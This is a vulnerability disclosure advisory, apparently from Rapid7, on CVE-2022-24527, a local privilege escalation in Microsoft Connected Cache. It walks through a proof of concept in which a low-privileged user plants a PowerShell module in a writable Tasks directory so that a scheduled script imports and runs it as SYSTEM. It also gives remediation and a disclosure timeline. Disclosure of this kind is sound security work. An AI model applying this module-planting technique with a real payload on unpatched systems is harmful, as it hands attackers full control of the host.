Last updated at Tue, 12 Apr 2022 17:15:25 GMT
On April 12, 2022, Microsoft published CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache. The vulnerability allowed a local low-privileged user to execute arbitrary Powershell as SYSTEM due to improper file permission assignment (CWE-732).
Product descriptionConnected Cache is a feature used by Microsoft Endpoint Manager "Distribution Points" to support "Delivery Optimization."
CreditThis issue was discovered and reported by security researcher Jake Baines as part of Rapid7's vulnerability disclosure program.
ExploitationWhen Connected Cache is in use on a Distribution Point, it is installed, in part, into C:Doinc. Below, you can see that there are some Powershell scripts within that directory:
C:>dir /s /b C:Doinc C:DoincProduct C:DoincProductInstall C:DoincProductInstallLogs C:DoincProductInstallTasks C:DoincProductInstallTasksCacheNodeKeepAlive.ps1 C:DoincProductInstallTasksMaintenance.ps1 C:DoincProductInstallTasksSetDrivesToHealthy.ps1
Low-privileged users only have read and execute permissions on the Powershell scripts.
C:DoincProductInstallTasks>icacls *.ps1 CacheNodeKeepAlive.ps1 NT AUTHORITYSYSTEM:(I)(F) NT AUTHORITYNETWORK SERVICE:(I)(F) BUILTINAdministrators:(I)(F) BUILTINUsers:(I)(RX) Maintenance.ps1 NT AUTHORITYSYSTEM:(I)(F) NT AUTHORITYNETWORK SERVICE:(I)(F) BUILTINAdministrators:(I)(F) BUILTINUsers:(I)(RX) SetDrivesToHealthy.ps1 NT AUTHORITYSYSTEM:(I)(F) NT AUTHORITYNETWORK SERVICE:(I)(F) BUILTINAdministrators:(I)(F) BUILTINUsers:(I)(RX) Successfully processed 3 files; Failed processing 0 files
The Powershell scripts are executed every 60 seconds by the Task Scheduler as NT AUTHORITYSYSTEM. All that is fine. The following part is where trouble begins. This is how SetDrivesToHealthy.ps1 starts:
try { import-module 'webAdministration' $error.clear()
When SetDrivesToHealthy.ps1 executes, it attempts to load the webAdministration module. Before searching the normal %PSModulePath% path, SetDrivesToHealthy.ps1 looks for the import in C:DoincProductInstallTasksWindowsPowerShellModuleswebAdministration. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to C:DoincProductInstallTasks:
C:DoincProductInstall>icacls ./Tasks/ ./Tasks/ NT AUTHORITYSYSTEM:(I)(OI)(CI)(F) NT AUTHORITYNETWORK SERVICE:(I)(OI)(CI)(F) BUILTINAdministrators:(I)(OI)(CI)(F) BUILTINUsers:(I)(OI)(CI)(RX) BUILTINUsers:(I)(CI)(AD) BUILTINUsers:(I)(CI)(WD) CREATOR OWNER:(I)(OI)(CI)(IO)(F)
An attacker can create the necessary directory structure and place their own webAdministration so that SetDrivesToHealthy.ps1 will import it. In the proof of concept below, the low-privileged attacker creates the directory structure and creates a PowerShell script that creates the file C:r7.
C:DoincProductInstallTasks>dir C: Volume in drive C has no label. Volume Serial Number is 3073-81A6 Directory of C: 01/04/2022 05:01 PM Doinc 01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294 01/04/2022 03:48 PM inetpub 07/07/2021 04:05 AM PerfLogs 01/05/2022 09:29 AM Program Files 01/05/2022 09:29 AM Program Files (x86) 01/05/2022 09:16 AM SCCMContentLib 01/05/2022 09:15 AM SMSPKGC$ 01/05/2022 09:17 AM SMSSIG$ 01/05/2022 09:17 AM SMS_DP$ 01/04/2022 05:04 PM Users 01/04/2022 03:48 PM Windows 0 File(s) 0 bytes 12 Dir(s) 239,837,327,360 bytes free C:DoincProductInstallTasks>mkdir WindowsPowerShell C:DoincProductInstallTasks>mkdir WindowsPowerShellModules C:DoincProductInstallTasks>mkdir WindowsPowerShellModuleswebAdministration C:DoincProductInstallTasks>echo New-Item C:r7.txt > WindowsPowerShellModuleswebAdministrationwebAdministration.psm1 C:DoincProductInstallTasks>dir C: Volume in drive C has no label. Volume Serial Number is 3073-81A6 Directory of C: 01/04/2022 05:01 PM Doinc 01/04/2022 05:15 PM DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294 01/04/2022 03:48 PM inetpub 01/05/2022 01:49 PM 0 r7.txt 07/07/2021 04:05 AM PerfLogs 01/05/2022 09:29 AM Program Files 01/05/2022 09:29 AM Program Files (x86) 01/05/2022 09:16 AM SCCMContentLib 01/05/2022 09:15 AM SMSPKGC$ 01/05/2022 09:17 AM SMSSIG$ 01/05/2022 09:17 AM SMS_DP$ 01/04/2022 05:04 PM Users 01/04/2022 03:48 PM Windows 1 File(s) 0 bytes 12 Dir(s) 239,836,917,760 bytes free C:DoincProductInstallTasks>icacls C:r7.txt C:lol.txt NT AUTHORITYSYSTEM:(I)(F) BUILTINAdministrators:(I)(F) BUILTINUsers:(I)(RX) Successfully processed 1 files; Failed processing 0 files C:DoincProductInstallTasks>
As you can see the C:r7.txt file is created, demonstrating the privilege escalation. Process monitor capture attached screenshot from the process monitor captures the PowerShell module being read in and the file being created by the SYSTEM user.
RemediationFollow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.
Disclosure timelineJanuary 5, 2022: Issue disclosed to the vendor
January 5, 2022: Vendor acknowledgement
January 6, 2022: Vendor assigns a case identifier
January 10-11, 2022: Vendor and researcher discuss clarifying details
January 19, 2022: Vendor confirms the vulnerability
February-March 2022: Vendor and researcher coordinate on disclosure date and CVE assignment
April 12, 2022: Public disclosure (this document)
Additional reading:
- CVE-2022-1026: Kyocera Net View Address Book Exposure
- Analyzing the Attack Landscape: Rapid7's 2021 Vulnerability Intelligence Report
- Cloud Pentesting, Pt. 1: Breaking Down the Basics
- CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)
Get the latest stories, expertise, and news about security today.
SubscribeAttachments
- Original Link
- Original Document
- Permalink
Disclaimer
Rapid7 Inc. published this content on 12 April 2022 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 12 April 2022 17:21:08 UTC.